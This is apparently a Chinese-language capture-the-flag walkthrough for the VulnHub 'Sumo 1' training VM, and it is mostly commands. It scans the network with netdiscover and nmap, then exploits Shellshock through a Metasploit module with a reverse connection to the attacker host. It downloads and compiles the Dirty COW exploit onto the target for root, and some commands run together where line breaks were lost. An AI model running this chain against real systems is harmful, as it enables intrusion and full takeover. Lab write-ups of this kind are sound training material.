虛擬機下載地址:https://www.vulnhub.com/entry/sumo-1,480/
虛擬機簡介:獲取root下的flag
目標:1個flag
級別:初級
1、通過netdiscover檢測主機IP位址netdiscover -r 192.168.207.0/242、通過nmap進行埠掃描
nmap -A -sS -sV -v -p- 192.168.207.174查看只開放22和80埠
3、WEB滲透測試3.1 使用dirb進行掃描沒有發現有用信息,使用nikto探測可能存在CVE-2014-6271和CVE-2014-6278漏洞nikto -host http://192.168.207.1743.2 使用metasploit搜索CVE-2014-6271
3.3 加載漏洞利用模塊
該模塊通過將HTTP_USER_AGENT環境變量設置為惡意函數定義來定位Apache Web伺服器中的CGI腳本
use exploit/multi/http/apache_mod_cgi_bash_env_execset rhosts 192.168.207.174set lhost 192.168.207.129set targeturi /cgi-bin/testexploit3.4 使用sysinfo命令來發現計算機的作業系統是Ubuntu 12.043.5 較舊的作業系統具有易受攻擊的內核,使用髒牛進行漏洞提權4、系統提權4.1 複製提權文件並開啟http服務
cp /usr/share/exploitdb/exploits/linux/local/40839.c ./python -m SimpleHTTPServer 804.2 靶機進入shell模式,並下載提權文件shellpython -c 'import pty; pty.spawn("/bin/sh")'cd /tmpwget http:gcc -pthread 40839.c -o dirty -lcrypt4.3 根據提權腳本使用方法4.4 使用ssh連接靶機,用戶為firefart,密碼為12345,查看flagssh firefart@192.168.207.174cat /root/root.txt